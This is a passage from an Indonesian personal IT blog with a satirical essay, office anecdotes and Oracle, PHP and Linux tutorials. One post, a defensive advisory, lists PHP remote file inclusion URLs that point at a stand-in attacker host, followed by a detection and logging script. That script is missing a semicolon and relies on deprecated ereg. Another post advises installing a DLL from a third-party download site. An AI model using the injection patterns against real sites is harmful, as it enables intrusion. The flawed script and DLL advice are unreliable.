LaGiPusHinGWitH ----- IT

About This Site

Teknologi Informasi sangatlah penting untuk menunjang kemajuan ilmu pengetahuan di Indonesia pada khususnya. Dan ini semua haruslah ditunjang dengan kemampuan yang sepadan dengan kemajuan teknologi itu sendiri, terlebih untuk para praktisi IT itu sendiri. Akhir kata "Selamat berkarya" untuk kita semua. koy^k^guy^ - Owner

Navigation

Home |

Calendar

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Statistics

This page has been viewed 256153 times
Page rendered in 0.9521 seconds
37 queries executed
Debug mode is on
Total Entries: 61
Total Comments: 17
Total Trackbacks: 42607
Most Recent Entry: 09/28/2010 09:19 pm
Most Recent Comment on: 09/28/2010 09:51 pm
Total Members: 1
Total Logged in members: 0
Total guests: 5
Total anonymous users: 0
Most Recent Visitor on: 02/06/2012 02:54 am
The most visitors ever was 269 on 05/28/2011 03:07 pm

Referrers

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

DAri milis nih...buat bahan renungan
Indonesia Lebih Barat dari Barat
By: Ida Arimurti

Lucu juga, mentertawakan diri sendiri yg sangat inferiority complex..
Pernahkah ketika anda masih SMA pergi ke Club atau Diskotik?.. saya pernah! dan bangga banget!
Pernah ke New York City?.. my city! tapi bete ama bouncer-nya gak boleh masuk gara-gara umur waktu itu masih 20 lebih 9 bulan! Damn, I Love Indonesia, lebih bebas!

Sapa bilang Amerika negara bebas??? Pernahkan anda melihat (atau merasakan sendiri) sekelompok anak muda minum bir?… wah bukan pemandangan anehdi parkiran Circle K Bandung! every single store! Tau Texas?.. Tau! Kota yang ngga boleh minum alkohol sembarangan kan? mending di Bandung, atau di Jakarta, mau mabok sambil nyetir juga boleh!

Pernahkah anda membeli majalah yang porno, setengah porno -apapun sebutannya- yang covernya adalah wanita berbikini dengan headline 7 Trik Liar Di atas Ranjang?
Kupu Kupu Malam Kota Solo dan majalah yang setiap edisinya tidak pernah luput dari kata Mr. Happy? ...

Ngga tuh (Boong!! Liat ada apa di bawah kasur? yang diumpetin di lemari? Bagasi mobil belakang)..
Di mana anda beli majalah Playboy? atau majalah sejenis itu?.. sebelum ke kantor di tukang koran, dan bangga banget punya playboy karena ngga usah subscribe kaya di Amerika, aneh padahal negara USA produsen-nya kok mereka ribet banget sih, harus liatin ID segala?

di Indonesia di emperan juga ada, di mana aja yang penting hatibangga! Siapa yang bangga ada majalah Playboy Indonesia? Siapa yang bangga dengan Cosmopolitan Indonesia? .. Ya orang Indonesia, mereka bangga! Playboy pertama di Asia Tenggara!! (tapi kok di Malaysia malah ngga ada, malahan di Singapore majalah sekelas Cosmopolitan aja dibredel? mereka bodo banget deh)

Kita seneng deh mengadopsi semua hal dari luar negeri!
Siapa yang suka nonton plagiatnya Saturday Night Live?… Gila lucu banget ya? Lucu mana dengan Indonesia yang suka niru?

Siapa yang BENCI Amerika???… KITAAA ORANG INDONESIA BENCI banget Amerika, makanya kita memilih dan senengggg banget minum Pepsi, Beli MC.D, Pake HaPe Motorola, Nonton film Hollywood, Beli I-Pod, Ngopi di Starbucks, Nonton Desperate Housewives, Ikutan Test TOEFL ..

Siapa benci Eropa? dan hal yang kebarat-baratan? ...
Kita deh sebagai Orang Indonesia, makanya kita belanja di Mall yang gaya eropabanget, Belanja baju di Mango, Makan Steak, Melakukan free sex biar kaya James Bond dan Matahari (anda pasti tau dong siapa dia kalau anda bisa berkomentar tentang RUU
APP) ..

kita juga sebel banget dengan hal yang
kebarat-baratan apalagi eropa, makanya kita pake handphone Nokia dan mobil BMW ..

Mau ngga jadi tuan rumah Miss Universe?… DI INDONESIA??? KAPAN??? SERU BANGET TUH!!! aduh banyak cewek kece pake bikini. Udah malem finalnya di Indonesia aja, daripada di amerika kan udah ditolak, di Puerto Rico kan kemaren males jadi tuan rumah, lagian bukannya sekarang Tuan Rumah Miss Universe sedang dilempar ke negara miskin dan third world karena dianggap basi ama Amerikanya sendiri??

Indonesia sih pasti seneng banget dan bangga banget jadi buangan tuan rumah Miss Universe!
Pilih masuk AFI atau jadi juara Olimpiade Fisika? ...
AFI dong, kondang bo! kalau bisa semua masukreality show!

Olimpiade Fisika ngapain? paling direkrut ama Singapore atau Jerman, duh pendidikan itu ngga penting di Indonesia .. yang penting outlook, mudah membual, nepotisme.. kalau mau terlihat berpendidikan berlagak sok pinter aja.. asal lo bisa bual tentang playboy, RUU APP, meski belum tentu bener, yang penting ngomong!

Suka Infotainment? ... duuh kita sebagai orang Indonesia tuh seneng banget gila kalau ngomongin orang yang jelek-jeleknya.. Kita selalu haus dengan terbukanya Aib, daripada kaya Singapore yang malah bangga dengan National Geographic? apa gunanya?

Kalau E! chanel suka?.. duh cable masih jarang sih di Indonesia,di Pedesaan belom masuk.. jadi kita ngga tau.. lagian acaranya ngga mutu ya ngomongin artis dari sisi glamour dan kreatifnya doang, kurang ngomongin aib!

Cinta Produk Indonesia?.. duh Soeharto banget sih jamannya ACI, gihke malaysia aja yang produk lokalnya lebih kepake dari pada Pierre Cardin, Hugo Boss, Esprit, U2 ..

kita lebih suka negara kita “terjajah” dan dibanjiri produk asing ..emang kita Jepang yang produktif? lebih hebat kita dong, Indonesia yang selalu konsumtif tanpa jadi produktif, ampe minyak aja impor .. kita negara terkaya di dunia!

Bisa menari atau menyanyi khas Indonesia?..bisa, aku bisa breakdance dan ngerap pake bahasa Indonesia Apa itu Indonesia?.. Jawa minus Jawa Barat selebihnya negara tetangga,presiden jawa, menteri jawa, pejabat militer jawa,yang bukan orang Indonesia ngga boleh jadi presiden

Jakarta itu apa?.. Ibu Kota, pusat ekonomi, pusat bisnis, pusat pemerintahan, pusat indutrsi, pusat belanja, pusat hiburan, semua terpusat disini deh, ada Taman Mini Indonesia juga makanya untuk apa peduli ama Indonesia yang luas? yang mini-mini aja dulu ..

Tau fungsi dari New York City, Washington D.C, Los Angeles (Hollywood),Nebraska, Texas di Amerika? ..
aduh maaf pengetahuan kita terbatas, emang apaan sih? lagian kita tuh benci banget Amerika meski kita baca Playboy (dijawab dengan muka malu)

Dimana letak Bali?.. deket Indonesia
Apa arti Bhineka Tunggal Ika? .. biar beda dipaksa satu! tidak ada perbedaan yang ada penyatuan, negara hebat kan bisa mempersatukan yang beda ??

WOW Ada apa di program TV Indonesia selain beritanya?.. ada acara yang semua acaranya bisa didapet di TV-TV lain, pokoknya sejenis semua, ya Bhineka Tunggal Ika tadi.. kita kan lebih peduli rating (ssst! jangan bilang-bilang orang ya, tapi kita selalu punya pembenaran yang bisa bikin orang percaya kok)..

makanya orang Indonesia pinter-pinter kan? bisa menjadi negara yang melesat padahal ngga punya landasan .. Siapa sih yang bisa jadi PuteriIndonesia?.. Itu loh yang bisa bilang negara Indonesia memiliki keanekaragaman budaya! pinter banget kan dia jawab kaya gitu? dia berpikir keras bahwa cuma Indonesia yang punya keanekaragaman budaya.. negara lain emang ada?

eh .. atau si Puteri belum pernah ke baca buku? dia hobby dandan sih! atau si Puteri belum pernah ke keluar negeri ya? nah makanya dia disebut Puteri Indonesia yang Indonesia banget!

Nov 25, 2006

Lagi asyik2nya gw remote server DataBase gw, tiba2 aja ada pesen masuk...hmmm apa yahh n dari siapa nih??
(Mungkin nga yah dari mahluk manis penghuni LT3....abis mayoritas cewe sih Smile )
Olala ternyata dari Supervisor LT3, di LT3 itu dari Departemen Sales divisi Telemarketing (cowo pula).....
Begini bunyi pesennya...."Pak Gunawan, Aplikasi input data tidak bisa koneksi ke database. Sedangkan aplikasi
tersebut diperlukan untuk melakukan input data customer baru, harap dicek secepatnya”. Yahhhhh...orang lagi banyak
kerjaan juga, (gw lagi setting ulang server gw buat persiapan upgrade ke Oracle 10g). Walhasil dengan langkah gontai
dan wajah kusut masai, dengan seikat rumput di bibir...halah kaya bikin cerita aja (ini asli rekasayasa gw aja sih),
gw ke Lt3 n langsung nemuin SPV nya. Pas gw coba jalanin tuh aplikasi ... yup ternyata emang nga bisa konek kedatabase,
apa ya masalahnya...biasanya normal2 aja (yee..jelas normal lah biasanya, kl nga normal2 dari dulu lo nga bakalan dipanggil man).

Ya udah gw coba buka deh source codenya, liat2 koneksi ke Databasenya...normal nga ada yang salah, koneksi jaringan ke server… OK!
Apalagi yah...hmmm oh yah, restart komputernya aja Pak...(gw minta ke SPV supaya restart dia punya komputer...siapa tau berhasil),
eit protes yah...kok caranya mangga dua banget(bodo amat, daripada so mangga muda, mangga harum manis n etc lah).
Hmmm...sambil nunggu booting komputer iseng gw liat2 pemandangan indah nan elok...cos, yah lo tau sendiri lah man.
Dah benerkan...username sama passwordnya?? Udah pak!
Yup di coba lagi Pak..aplikasinya, eng ing eng...tadaaaa.., jreg!!!glek nga bisa juga!!! Damn, what the Hell Shit!!!

Akhirnya gw ambil kesimpulan jangan2 servernya bermasalah lagi nih!! oh yah servernya terpisah loh dari server yang lagi gw
setting ulang. Cek...cek...cek sound...nga papa, ditambah LT2 nga pada komplen..so berarti server no problemo. Akh daripada
gw pusing sendirian mending gw laporan deh sama komandan..eh sama manager gw. n Jawabannya adalaaaaahhh......restart server!!
Guuubraak...lebih mangga dua dari gw(hehehehhe.....berarti itu adalah memutus semua koneksi divisi sales yang sedang melobi
para customer atau mungkin ada yang sedang melakukan input data) but anyway..Duty is duty, walhasil gw kasih pengumuman.

Peenguman...pengumuman, untuk semua divisi yang berhubungan dengan Database DB4454 harap tidak melakukan aktifitas apapun juga,
dikarenakan pesawat mengalami turbulunce..eit salah deng, server mengalami kendala abnormal( hehehe so politis )
Yup server down...restart, database is running.... hmmm, pasti berhasil nih pikir gw (orang langsung server man yang direstart padahal
nga jadi jaminan juga sih).Dan hasilnya adalah kita tanyakan pada APV eit salah SPV Lt3...Blum bisa juga Pak Gunawan, Gabruk...gusrak!!!Oh my god...why???
Iseng gw tanya ama dia… tadi login ke komputernya benerkan pake username n password yang sama, yup!!!
ini account yang sama kan ... yup!!!
kemaren juga pake account ini kan ... yup!!!
hmmm...berarti account nga masalah nih.
Penasaran gw suruh aja dia restart lagi tuh komputernya..nah pas sampe login gw pantengin tuh loginnya dia
username ... bener ,
password ... elah dalah, ini nih permasalahannya. Si SPV nga masukkin password yang dah keregister keserver.
Dia rubah tuh password sama tanggal lahir anaknya, yah nga dikenallah sama tuh server…
Tapi pak saya tetep bisa login tuh...gundulmu, login mang nga ada masalah but koneksi yang bermasalah.
Lo pake boong pula lagi, bilang account sama kaya kemaren.

Gimana nga gondok sodara2, dah abis waktu gw...sampe restart server, ngasih pengumuman.
membuat aktifitas terhenti… cuma gara2 masalah password (damn).
Semenjak itu, kebijaksanaan about hak akses user sangat2 dibatasi sampe buat ngopy ke flasdisk aja nga bisa.

Kayanya salah gw juga sih yang melihat permasalahan langsung meluas tanpa melihat kemungkinan yang paling kecil.
But anyway..itu tetep jadi pengalaman buat gw..Ya toh...?? Toh Smile

Category: Security
Author: roninmorgue
Date: January, 01st 2007
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

----------------------------------------------------------------------------------

Affected Description
`````````````````````

Serangan web dewasa ini semakin banyak memanfaatkan vulnerabillity pada script PHP, yaitu saat seorang programmer tidak
melakukan sanitasi input pada script yang dia buat, disaat register_globals ON dan allow_fopen_url maka seorang attacker
dapat melakukan injeksi pada script PHP yang vulnerable secara remote.

Caranya yaitu dengan mengeksekusi script vulnerable dengan meng-inject melalui url dari server attacker yang telah berisi
script untuk melakukan exploitasi.
Dampak ini dapat dihilangkan dengan men-set register_globals OFF, tetapi cara ini kurang effektif karena banyak aplikasi
third party yang mengharuskan register_globals ON.

Better Solutions
``````````````````

Teknik-teknik PHP Injection yang sering digunakan oleh attacker :

1. ?&cmd;=<unix command>
2. &cmd;=<unix command>
3. http://www.target.com/main.php?r=http://attacker/cmd.txt\&cmd;=<unix command>
4. http://www.target.com/main.php?r=http://attacker/cmd.txt&cmd;=<unix command>
5. ?cmd=<unix command>

dengan melihat url tersebut kita dapat mengambil kesimpulan bahwa :

1. attacker menyimpan script inject dalam bentuk extension jpg, gif, dan txt
2. attacker menggunakan variabel cmd untuk injection
3. attacker menggunakan beberapa kombinasi penghubung

Berdasarkan hal tersebut kita dapat membuat sebuah script sederhana untuk mensanitasi bentuk url yang dicurigai sebagai
bentuk PHP Injection, serta melakukan logging terhadap aktifitas dari attacker.

Ok...to the point, this the script :
sertakan script ini pada file konfigurasi aplikasi kita.

1. <?php
2.
3.  if (
4.  ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
5.  ereg('gif&cmd;',$_SERVER['REQUEST_URI']) ||
6.  ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
7.  ereg('jpg&cmd;',$_SERVER['REQUEST_URI']) ||
8.  ereg('txt?cmd',$_SERVER['REQUEST_URI']) ||
9.  ereg('txt&cmd;',$_SERVER['REQUEST_URI']) ||
10.
11.  ereg('gif\?',$_SERVER['REQUEST_URI']) ||
12.  ereg('gif&',$_SERVER['REQUEST_URI']) ||
13.  ereg('jpg\?',$_SERVER['REQUEST_URI']) ||
14.  ereg('jpg&',$_SERVER['REQUEST_URI']) ||
15.  ereg('txt?',$_SERVER['REQUEST_URI']) ||
16.  ereg('txt&',$_SERVER['REQUEST_URI'])
17.
18.  )
19.  {
20.  // bagian untuk mencatat aktifitas hacking
21.  // dan mengirimkan email pada administrator
22. 
23.  $ip = $_SERVER['REMOTE_ADDR'];
24.  $date = date("m/d/Y g:i:s a");
25.  $referer = $_SERVER['HTTP_REFERER'];
26.  $uri = $_SERVER['REQUEST_URI']
27.
28.  $fl = fopen('log.txt', 'a');
29.  fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$uri."\n");
30.  fclose($fl);
31.  $msg = "Terdapat percobaan hacking pada server ".$_SERVER['REMOTE_ADDR']."
mencoba untuk mengeksekusi ".$_SERVER['REQUEST_URI'];
32.  mail('anstellwinkel@yahoo.com.au' ,'Percobaan hacking pada '.$_SERVER['REQUEST_URI'],$msg);
33.  die('Silahkan hentikan percobaan anda!');
34.  }
35.
36. ?>

penjelasan :

Baris 1 - 16 --> apabila ditemukan pola tersebut pada url maka script ini akan dieksekusi
Baris 23 - 30 --> mencatat IP address, tanggal, referer dan url yang digunakan oleh attacker serta mencatatnya pada
file log.txt
Baris 31 - 33 --> Mengirim semua aktifitas hacking ke email administrator

------------------------------------------------------------

Shoutz:
~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud, acieis)
~ mercubuana-it@yahoogroups.com ,
~ x-code staff n members at yogya_family_code, ^family_code^,
---------------------------------------------------------------

Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
anstellwinkel[at]yahoo[dot]com[dot]au
petambakudang[at]yahoo[dot]co[dot]id
---------------- [ EOF ] ----------------------------------------

gw curhat dikit nih man....pas gw mo mounted dan opened DB gw..ternyata si oracle nampilin message kl database gw mengalami inconsistensi antara file control01.ctl dan control02.ctl…

SQL*Plus: Release 10.1.0.3.0 - Production on Thu Jan 4 11:01:12 2007

Copyright (c) 1982, 2004, Oracle. All rights reserved.

SQL> Connected.
SQL> SQL> ALTER DATABASE mount
*
ERROR at line 1:
ORA-00214: controlfile ‘/app/oracle/oradata/cad2006/control02.ctl’ version
14033 inconsistent with file ‘/app/oracle/oradata/cad2006/control01.ctl’
version 14030

Disconnected from Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

apaan tuh file control01.ctl....? tanya dong kl penasaran ntar gw jawab deh!!!

Mana gw belom bikin backup controlfile pula…
walhasil gw bikin ulang deh file-file tersebut, gini nih caranya..:

CREATE CONTROLFILE REUSE DATABASE “cad2006” NORESETLOGS NOARCHIVELOG
MAXLOGFILES 50
MAXLOGMEMBERS 3
MAXDATAFILES 300
MAXINSTANCES 8
MAXLOGHISTORY 500
LOGFILE
GROUP 1 ‘/app/oracle/oradata/cad2006/redo01.log’ SIZE 1M,
GROUP 2 ‘/app/oracle/oradata/cad2006/redo02.log’ SIZE 1M,
GROUP 3 ‘/app/oracle/oradata/cad2006/redo03.log’ SIZE 1M
DATAFILE
‘/app/oracle/oradata/cad2006/sysaux01.dbf’ SIZE 210M,
‘/app/oracle/oradata/cad2006/system01.dbf’ SIZE 440M,
‘/app/oracle/oradata/cad2006/temp01.dbf’ SIZE 20M,
‘/app/oracle/oradata/cad2006/undotbs01.dbf’ SIZE 25M,
‘/app/oracle/oradata/cad2006/users01.dbf’ SIZE 5M;

Untuk lebih amannya lakukan backup terhadap file control secara rutin.

ini pengalaman gw waktu kompile kernel server database oracle gw biar detect Ethernetnya

1. DL driver for linux marvell-88e8050_linux_v8.16.2.3.tar.bz2 di
http://downloadfinder.intel.com/scripts-df-external/confirm.aspx?ftpDown=
ftp://aiedownload.intel.com/df-support/9576/eng/
marvell-88e8050_linux_v8.24.1.3.tar.bz2&agr=N&ProductID=1658&
DwnldId=9576&strOSs=90&OSFullName;=
Red%20Hat*%20Enterprise%20Linux%203.0&lang=eng

2. Untuk menginstal driver diperlukan file dan tools pada sistem linux :
1. Source kernel linux di /etc/src/linux
2. compiler tools (co: gcc)

3. Unpackaged driver marvell-88e8050_linux_v8.16.2.3.tar.bz2
tar -jxvf marvell-88e8050_linux_v8.16.2.3.tar.bz2
DriverInstall/
DriverInstall/README
DriverInstall/install.sh
DriverInstall/sk98lin.4
DriverInstall/sk98lin.tar.bz2
# cd DriverInstall/
# ls
install.sh README sk98lin.4 sk98lin.tar.bz2
# cat README
Instruksi instalasi untuk driver sk98lin

4. Instalasi Driver
# cd /DriverInstall
# ./install.sh
Ada 2 pilihan :
a. user installation mode
b. patch generation mode

pilih patch generation mode untuk melakukan instalasi secara langsung pada kernel, ikuti instruksinya.

5. Applying Patch Driver
untuk meng-apply ke kernel gunakan commands :
# cd /usr/src/linux
# cat /patch-location/sk98lin__vX.XX_a_b_c_patch | patch -p1

6. Konfigurasi kernel linux
# cd /usr/src/linux
# make menuconfig (mode konsol) atau xconfig (mode grafik)
Pilih pilihan untuk dikompile pada kernel baru
-- untuk kernel 2.4.x :
pilih menu ‘Network Device Support’
pilih ‘Ethernet (1000 Mbit)’
-- untuk kernel 2.6.x :
pilih menu ‘device drivers’
pilih ‘Network Device Support’
pilih ‘Ethernet (1000 Mbit)’

6.a. Pilih cara untuk menggunakan driver pada kernel linux
-- untuk mengkompile driver sebagai module, mark :
“Marvell Yukon Chipset/SysKonnect SK-98xx Support” with (M).
-- untuk mengintegrasikan driver secara permanent pada kernel linux, mark :
“Marvell Yukon Chipset/SysKonnect SK-98xx Support” with (*).

6.b. Pilih ‘Exit’

6.c. Pilih menu ‘Loadable module support’

6.d. Pilih ‘Enable loadable module support’

6.e. Pilih ‘Kernel module loader’

6.f. Untuk keluar konfigurasi pilih ‘Exit’

7. Kompilasi kernel linux
Setelah proses konfigurasi kernel selesai, lakukan kompilasi pada kernel
a. Buat semua dependensi (tidak diperlukan pada kernel 2.6.x)
# make dep
b. Buat binary kernel linux
# make clean bzImage
c. Buat semua modul dan instal ke /lib/modules
# make modules
# make modules_install

8. Menginstal kompilasi kernel linux
a. Instal kernel baru dengan meng-kopi ke boot directory
dengan mengeksekusi commands (co: Intel/x86 machines):
# cp arch/i386/boot/bzImage /boot/vmlinuz-new
# cp System.map /boot/System.map-new.

2. Edit file konfigurasi boot loader untuk booting dari kernel baru.

3. Reboot system dengan kernel baru.

sintak umum -->

Code:
CREATE OR REPLACE FUNCTION nama_fungsi
(parameter_1, ....)
RETURN tipe_data AS
variabel_1 tipe_data;
........
BEGIN
statemen_1;
........
RETURN nilai_yang_dikembalikan;
END;

contoh :

Code:
CREATE OR REPLACE FUNCTION SEGMENT (SALES NUMBER)
RETURN CHAR AS
SEGM CHAR(2);
BEGIN
IF (SALES >= 1000000) THEN
SEGM := ‘AA’;
ELSE IF ((SALES >= 700000) AND (SALES < 1000000)) THEN
SEGM := ‘AB’;
ELSE IF ((SALES >= 500000) AND (SALES < 700000)) THEN
SEGM := ‘AC’;
ELSE
SEGM := ‘AD’;
END IF;
RETURN SEGM;
END;
/

contoh itu adalah untuk pembuatan fungsi segmentasi dari customer berdasarkan pembelian.

fungsi ada :
- Fungsi tanpa parameter
- Fungsi dengan paramater
- Fungsi didalam fungsi (nested function)

Mulai sabtu kemaren (14 Juli 2007, dini hari)....gw dah upgrade slackware gw jadi R12, kesan pertama adalah...LUAR BIASA, semua paket dah yang gress semisal berhubung gw php programmer juga yah itu yang gw unggulkan,di R12 php yang dipake sudah PHP 5.x.x, apache udah 2.x.x, dan ngga kalah keren adalah tampilan KDEnya....smooth banget man pake 3.5.x. Terus yang ngga kalah heboh adalah kemampuan Plug n Play yang telah menjatuhkan citra Slackware sebagai distro yang KUNO....dan satu lagi saat gw Online...firefox gw running dengan excelent....terasa ringan, cepat dan enak dilat deh…
chatting pake Pidgin .... pokonya keren deh.

Ada yang mau coba....?Slackware mania.

Langsung aja, gw mo share pengalaman waktu melakukan konfigurasi buat koneksi PHP dengan Oracle dikantor gw…
Pertama gw ceritain arsitektur dari aplikasi yang akan gw bikin :

1. SQL Server berada pada database server dengan IP 172.17.50.XX
2. Web Server dengan Apache dan PHP dengan IP 172.17.50.XX
3. Oracle berada pada database server dengan IP 192.168.0.XXX dan 192.168.0.XX
4. Semuanya dihubungkan dengan gateway (sori IP nya ngga bisa disebutkan).

So...kesimpulannya semua database tidak berada pada satu mesin (tanya kenapa??? mana gw tahu bukan gw yang bikin sih...tapi kayanya berhubungan dengan security deh).

Terus...kita lanjut lagi ke curhatan gw, sampe mana yah? oh yah sampe MY GOD, THAT’s so Hard ;o Man!!!, Why??? jarang banget tutorial tentang PHP dengan Oracle ditambah PHP manual juga belum banyak membantu (soalnya gw nya buta banget).

Ok...gw tambahin deh spek dari Oracle Servernya sendiri menggunakan Oracle 9i dan 8i dan dikomputer web server terinstall Oracle Client 7.3.3, fungsi dari Oracle Client adalah sebagai penghubung ke Oracle server...nah disinilah letak TrouBLE utamanya, pertama gw coba ikutin dari PHP manualnya gimana cara mengaktifkan modul Oracle supaya didukung oleh PHP:

--// Buka “;"pada (php.ini)
;extension=php_oci8.dll
;extension=php_oracle.dll

penjelasannya sih gampang man...tapi ternyata ngga semudah itu!! Sampai puyeng pale gw tetep ngga berfungsi tuh modul, dengan peringatan tidak ditemukan oci.dll pada OS kita (padahal ada), iseng gw googling deh nyari file oci.dll n nemu juga akhirnya disertai dengan manualnya:

This dll-file was downloaded
from http://www.dll-files.com
Install notes:

º Use ExpressZIP to extract the file to
º your windows\system directory

n walah berhasil juga ... pas gw copy oci.dll di System32 dan System, PHP mengenali modul oci8 dan oracle Wink ... selesaikah masalah?? not yet man, cos setelah gw coba masukin script penghubung kaya gini nih "

<?php

$c1 = OCILogon("$username","$password","$dbname" );

if ($c1 == false){
echo OCIError($connection)."not connected";
exit;
}
else
{
echo "success connecting to my oracle databases";
}

?>

pesen yang gw dapetin selalu Warning: _oci_open_server: ORA-12154: TNS:could not resolve service name.

Gw googling lagi deh arti dari pesen error itu… ternyata harus ada file tnsnames.ora pada folder oracle yang mengandung konfigurasi yang mengarahkan pada letak dan nama service dari server Oraclenya:

--// catt: semua konfigurasi dah gw edit
JOUNIN =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(Host = hostname-or-ipaddress)(Port = 1521))
(CONNECT_DATA =
(SID = sidname)
)
)

hmmm...filenya dah ada dengan konfigurasi bener tuh!!! :\ , trus masalahnya dimana yah??? gw baca lagi deh manual PHP-nya, akhirnya walah...gw ngga liat satu buah statement like this “These functions allow you to access Oracle8 and Oracle7 databases. It uses the Oracle8 Call-Interface (OCI8). You will need the Oracle8 client libraries to use this extension.”

My..GOD that it’s, Oracle8 client libraries to use this extension sedangkan gw pake Oracle7.3.3 client yang memiliki perbedaan konfigurasi dengan Oracle8i dan 9i dimana tidak mengenali parameter SID dan sudah menggantinya dengan parameter SERVICE_NAME ;o , ya udah akhirnya gw ganti clientnya dengan Oracle9i client dan mengkonfigurasi ulang file tnsnames.ora nya jadi seperti ini:

JOUNIN =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = hostname-or-ipaddress)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = servicename)
)
)

Selesaikah....??? huuuuuuaaaaaaaaa Surprised nangis deh gw, blom bisa juga man!!! hampir asa gw putus nih, mana under presure pula nih :\ , utak-atik lagi deh gw ... ngubek2 php manual sampe masuk forum2 luar n masuk milis… n hasilnya adalah gw nemuin jawabannya, karena Oracle servernya berada pada lain jaringan maka kita harus mendekripsikan terlebih dahulu SERVICE_NAME nya pada script PHP kita, bingung yah??? ya udah gw kasih contoh langsung aja yah....kita edit aja file koneksi.php

<?php

$db = " (DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.0.XXX)(PORT = 1521))
(CONNECT_DATA = (SERVICE_NAME = servicename))
)";

$c1 = OCILogon("username","password",$db);

if ($c1 == false){
echo OCIError($connection)."not connected";
exit;
}
else
{
echo ";success connecting to my oracle databases";
}

?>

Taaaadaaaaaa.....berhasil man, now it will work.

Ok ... sekian dulu kisah perjuangan gw, buat para master sori kl kesannya gw bego banget..tapi emang gw bego sih kl soal ini , trus kesannya gw sebentar yah ngopreknya..padahal gw ngabisin waktu seminggu lebih cuma buat meng-koneksikan PHP dengan Oracle Server :\ . Trus pesen gw, teruslah bereksperimen...kl nemu masalah cari tahu sendiri dulu deh (googling, forum, milis etc)kl dah mentok banget baru minta bantuan langsung.

Terakhir… buat para programmer PHP, jangan terpaku dengan MySQL!!! cos enterprise banyak menggunakan Oracle dan SQL Server.

OK...Goodluck for Us, see you next time!!!Smile

Dear all,

gw mo bagi2 cerita nih soal gimana membuat koneksi antara oracle denga SQL server 2000(soalnya di kantor gw make itu 2 jenis DB), saat kita hendak melakukan query dari Oracle ke SQL Server, misal tabel pertama ada di oracle dan tabel kedua ada di SQL Server dan kita ingin melakukan join terhdap kedua tabel tersebut..kl dari oracle ke oracle sih gampang kita tinggal melakukan konfigurasi pada file TNSNAMES.ORA ditiap klien, dan kita bikin DBLINK. Yang sulit kl beda platform misal ke SQl Server.

Kondisinya adalah gw coba bikin DBLINK dari Oracle 10g (RHELAS3) ke SQLServer 2000 (win2000) menggunakan heterogenous service (hsodbc), selain itu ada cara lain dengan menggunakan Transparent Gateway(tapi ngga usah dibahas sekarang...blom diterapin).

To the point, langkah2 yang di lakukan adalah:

1. membuat DSN terlebih dahulu ke SQlServer dengan nama SQLSERVER(terserah lo semua sih), dan buat koneksi (dengan login berdasarkan windows authentication atau SQL Authentication)
2. melakukan konfigurasi di server Oracle pada file :
a. /app/oracle/product/10.0.1/hs/admin/inithsodbc.ora

# This is a sample agent init file that contains the HS parameters that are
# needed for an ODBC Agent.

#
# HS init parameters
#
HS_FDS_CONNECT_INFO = SQLSERVER // nama DSN
HS_FDS_TRACE_LEVEL = 0
HS_FDS_SHAREABLE_NAME = <full path name of odbc driver manager or driver>

#
# ODBC specific environment variables
#
set ODBCINI=<full path name of the odbc initilization file>

#
# Environment variables required for the non-Oracle system
#
set <envvar>=<value>

b. /app/oracle/product/10.0.1/network/admin/listener.ora

SID_LIST_LISTENER =
(SID_LIST =
(SID_DESC =
(SID_NAME = PLSExtProc)
(ORACLE_HOME = /app/oracle/product/10.0.1)
(PROGRAM = extproc)
)
(SID_DESC =
(GLOBAL_DBNAME = db2006) // nama global db oracle
(ORACLE_HOME = /app/oracle/product/10.0.1)
(SID_NAME = db2006) // nama service oracle
(PROGRAM=hsodbc)
)
)

LISTENER =
(DESCRIPTION_LIST =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC))
)
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = localhost.localdomain)(PORT = 1521))
)
)
)

c. /app/oracle/product/10.0.1/network/admin/tnsnames.ora

DB2006 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = localhost.localdomain)(PORT = 1521))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = db2006)
)
(HS=OK)
)

3. lakukan restart service LSNRCTL

4. membuat DBLINK

CREATE DATABASE LINK CAD2004CONNECT
CONNECT TO “172.17.x.x\Gugun” // alamat IP SQLServer
IDENTIFIED BY Gugunpassword
USING ‘db2006’;

udah deh...gampang kan!!!

Pembangunan infrastruktur TI yang kuat dan memadai dinilai sangat penting sekarang ini. Mengingat setiap hari jumlah data yang harus direkam menjadi semakin banyak. Ratusan bahkan ribuan data data baru masuk setiap harinya. Belum lagi lalu lintas data yang menjadi semakin ramai juga memerlukan perhatian khusus.

